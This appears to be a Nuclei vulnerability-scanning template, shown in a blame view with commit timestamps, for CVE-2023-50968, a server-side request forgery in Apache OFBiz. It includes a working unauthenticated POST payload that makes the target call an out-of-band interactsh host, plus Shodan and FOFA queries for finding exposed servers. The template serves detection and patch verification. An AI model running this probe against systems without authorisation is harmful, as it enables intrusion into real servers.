2023-12-28 13:56:29 +00:00
id : CVE-2023-50968
info :
name : Apache OFBiz < 18.12.11 - Server Side Request Forgery
author : your3cho
severity : high
description : |
Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations. The same uri can be operated to realize a SSRF attack also without authorizations. Users are recommended to upgrade to version 18.12.11, which fixes this issue.
reference :
- https://lists.apache.org/thread/x5now4bk3llwf3k58kl96qvtjyxwp43q
- http://www.openwall.com/lists/oss-security/2023/12/26/2
- https://nvd.nist.gov/vuln/detail/CVE-2023-50968
2024-01-14 13:49:27 +00:00
- https://issues.apache.org/jira/browse/OFBIZ-12875
- https://ofbiz.apache.org/download.html
2023-12-29 03:12:22 +00:00
classification :
2024-01-14 13:49:27 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
2023-12-29 03:12:22 +00:00
cve-id : CVE-2023-50968
2024-01-14 13:49:27 +00:00
cwe-id : CWE-918,CWE-200
epss-score : 0.32266
2024-03-23 09:28:19 +00:00
epss-percentile : 0.96905
2024-01-14 13:49:27 +00:00
cpe : cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
2023-12-28 13:56:29 +00:00
metadata :
2024-01-02 06:27:26 +00:00
verified : true
2024-01-14 13:49:27 +00:00
max-request : 4
2024-01-02 06:27:26 +00:00
vendor : apache
product : ofbiz
2024-01-14 13:49:27 +00:00
shodan-query : html:"OFBiz"
fofa-query : app="Apache_OFBiz"
2023-12-28 13:56:29 +00:00
tags : cve,cve2023,apache,ofbiz,ssrf
2023-12-29 03:12:22 +00:00
variables :
str : "{{rand_base(6)}}"
2023-12-28 13:56:29 +00:00
http :
- raw :
- |
2023-12-29 03:12:22 +00:00
POST /partymgr/control/{{path}} HTTP/1.1
2023-12-28 13:56:29 +00:00
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2023-12-29 03:12:22 +00:00
{{parameter}}={"http://{{interactsh-url}}/api":"{{str}}"}
2023-12-28 13:56:29 +00:00
2023-12-29 03:12:22 +00:00
payloads :
path :
- getJSONuiLabel
- getJSONuiLabelArray
2023-12-28 13:56:29 +00:00
2023-12-29 03:12:22 +00:00
parameter :
- requiredLabel
- requiredLabels
2023-12-28 13:56:29 +00:00
2023-12-29 03:12:22 +00:00
attack : clusterbomb
2023-12-28 13:56:29 +00:00
stop-at-first-match : true
2023-12-29 03:12:22 +00:00
matchers-condition : and
2023-12-28 13:56:29 +00:00
matchers :
- type : word
part : interactsh_protocol
words :
- "http"
- type : word
part : header
words :
- 'OFBiz.Visitor='
2024-01-30 06:46:18 +00:00
# digest: 490a00463044022040e378f08f425867a4da9383e75123bebf9acb790e7e3aa528b45f6d2f610be202206082fa933b506d90b7eeaf07e3ace10fbc5382b24483ab3e6a652c6c47dd9e70:922c64590222798bb761d5b6d8e72950